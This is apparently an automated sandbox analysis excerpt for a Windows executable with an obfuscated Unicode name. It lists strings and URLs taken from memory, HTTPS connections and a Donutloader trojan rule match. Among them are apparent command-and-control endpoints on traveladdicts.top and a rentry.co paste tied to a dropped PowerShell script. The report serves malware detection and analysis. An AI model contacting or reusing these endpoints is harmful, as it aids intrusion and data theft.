              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: powershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: http://www.testlab2008.com/indices/submit.php?c=CD&i=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2256477161.0000000000888000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000886000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255396657.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ
              Source: powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnLR
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2225011826.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085160314.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2098375741.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000083C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907875064.000000000365F000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255853718.0000000000820000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907535156.000000000365D000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085349574.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.000000000367C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085439303.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.0000000000834000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2224467705.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api2
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1760402571.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/api6Ic=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/d
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/n)6
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/r
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1758494799.000000000365A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top/z
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top:443/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traveladdicts.top:443/apitps://traveladdicts.top:443/api
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49236
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49891 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49224 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49233 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49234 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49235 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49236 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.9:49237 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0083C4E00_3_0083C4E0
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0083C4E00_3_0083C4E0
